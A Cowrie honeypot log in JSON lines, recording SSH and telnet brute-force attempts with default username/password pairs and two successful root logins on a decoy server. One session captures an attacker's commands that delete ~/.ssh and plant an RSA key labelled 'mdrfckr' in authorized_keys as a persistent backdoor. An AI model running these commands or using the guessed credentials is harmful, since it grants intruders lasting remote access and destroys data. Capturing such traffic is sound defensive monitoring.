{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:01:40.787451Z","src_ip":"45.150.34.92","session":"871b59aade0d"}
{"eventid":"cowrie.login.failed","username":"runcloud","password":"runcloud","message":"login attempt [runcloud/runcloud] failed","sensor":"my-vps","timestamp":"2025-09-09T00:01:41.081690Z","src_ip":"93.113.63.124","session":"cf88310a9149"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:01:42.156505Z","src_ip":"93.113.63.124","session":"cf88310a9149"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":36840,"dst_ip":"1.2.3.4","dst_port":22,"session":"2342f8930407","protocol":"ssh","message":"New connection: 182.18.161.165:36840 (1.2.3.4:22) [session: 2342f8930407]","sensor":"my-vps","timestamp":"2025-09-09T00:02:42.251535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:02:42.252622Z","src_ip":"182.18.161.165","session":"2342f8930407"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:02:42.506860Z","src_ip":"182.18.161.165","session":"2342f8930407"}
{"eventid":"cowrie.login.failed","username":"owner","password":"owner","message":"login attempt [owner/owner] failed","sensor":"my-vps","timestamp":"2025-09-09T00:02:43.567133Z","src_ip":"182.18.161.165","session":"2342f8930407"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:02:44.824513Z","src_ip":"182.18.161.165","session":"2342f8930407"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":46904,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3d00120374a","protocol":"ssh","message":"New connection: 93.113.63.124:46904 (1.2.3.4:22) [session: e3d00120374a]","sensor":"my-vps","timestamp":"2025-09-09T00:02:47.730879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:02:47.731747Z","src_ip":"93.113.63.124","session":"e3d00120374a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:02:47.872619Z","src_ip":"93.113.63.124","session":"e3d00120374a"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"dspace123","message":"login attempt [dspace/dspace123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:02:48.330704Z","src_ip":"93.113.63.124","session":"e3d00120374a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:02:49.407013Z","src_ip":"93.113.63.124","session":"e3d00120374a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:02:50.561305Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}
{"eventid":"cowrie.session.closed","duration":180.15517902374268,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:02:50.566319Z","src_ip":"212.227.125.160","session":"fc771ca8b011"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":56234,"dst_ip":"1.2.3.4","dst_port":22,"session":"8119be4f0e41","protocol":"ssh","message":"New connection: 45.150.34.92:56234 (1.2.3.4:22) [session: 8119be4f0e41]","sensor":"my-vps","timestamp":"2025-09-09T00:02:57.075832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:02:57.076940Z","src_ip":"45.150.34.92","session":"8119be4f0e41"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:03:03.304793Z","src_ip":"45.150.34.92","session":"8119be4f0e41"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:03:03.306635Z","src_ip":"45.150.34.92","session":"8119be4f0e41"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":55506,"dst_ip":"1.2.3.4","dst_port":22,"session":"e015c1041321","protocol":"ssh","message":"New connection: 93.113.63.124:55506 (1.2.3.4:22) [session: e015c1041321]","sensor":"my-vps","timestamp":"2025-09-09T00:03:54.643946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:03:54.651896Z","src_ip":"93.113.63.124","session":"e015c1041321"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:03:54.720865Z","src_ip":"93.113.63.124","session":"e015c1041321"}
{"eventid":"cowrie.login.failed","username":"gitrun","password":"12345678","message":"login attempt [gitrun/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:03:55.009021Z","src_ip":"93.113.63.124","session":"e015c1041321"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:03:56.081992Z","src_ip":"93.113.63.124","session":"e015c1041321"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":43836,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fb0741a7539","protocol":"ssh","message":"New connection: 182.18.161.165:43836 (1.2.3.4:22) [session: 8fb0741a7539]","sensor":"my-vps","timestamp":"2025-09-09T00:03:57.699127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:03:57.700217Z","src_ip":"182.18.161.165","session":"8fb0741a7539"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:03:57.960185Z","src_ip":"182.18.161.165","session":"8fb0741a7539"}
{"eventid":"cowrie.login.failed","username":"backuppc","password":"backuppc","message":"login attempt [backuppc/backuppc] failed","sensor":"my-vps","timestamp":"2025-09-09T00:03:59.042587Z","src_ip":"182.18.161.165","session":"8fb0741a7539"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:00.305624Z","src_ip":"182.18.161.165","session":"8fb0741a7539"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35849,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c675eb87b6f","protocol":"telnet","message":"New connection: 212.227.125.160:35849 (1.2.3.4:23) [session: 7c675eb87b6f]","sensor":"my-vps","timestamp":"2025-09-09T00:04:12.544220Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":54968,"dst_ip":"1.2.3.4","dst_port":22,"session":"30a9fbc14f88","protocol":"ssh","message":"New connection: 45.150.34.92:54968 (1.2.3.4:22) [session: 30a9fbc14f88]","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.305480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.306505Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.323815Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.login.success","username":"root","password":"wu123456","message":"login attempt [root/wu123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.435922Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:04:15.526932Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.527728Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.528766Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.547930Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:04:15.601385Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.602175Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.622618Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.623619Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":54984,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d3a73b14287","protocol":"ssh","message":"New connection: 45.150.34.92:54984 (1.2.3.4:22) [session: 0d3a73b14287]","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.639254Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.640166Z","src_ip":"45.150.34.92","session":"0d3a73b14287"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.657614Z","src_ip":"45.150.34.92","session":"0d3a73b14287"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:04:15.768437Z","src_ip":"45.150.34.92","session":"0d3a73b14287"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.788881Z","src_ip":"45.150.34.92","session":"0d3a73b14287"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":53626,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb47839ed8ac","protocol":"ssh","message":"New connection: 45.150.34.92:53626 (1.2.3.4:22) [session: cb47839ed8ac]","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.805568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.806708Z","src_ip":"45.150.34.92","session":"cb47839ed8ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.824242Z","src_ip":"45.150.34.92","session":"cb47839ed8ac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.935801Z","src_ip":"45.150.34.92","session":"cb47839ed8ac"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.954334Z","src_ip":"45.150.34.92","session":"30a9fbc14f88"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:16.955168Z","src_ip":"45.150.34.92","session":"cb47839ed8ac"}
{"eventid":"cowrie.session.closed","duration":31.342297077178955,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:04:43.886441Z","src_ip":"212.227.125.160","session":"7c675eb87b6f"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":37792,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ff2e2471449","protocol":"ssh","message":"New connection: 93.113.63.124:37792 (1.2.3.4:22) [session: 2ff2e2471449]","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.003026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:04:58.004201Z","src_ip":"93.113.63.124","session":"2ff2e2471449"}
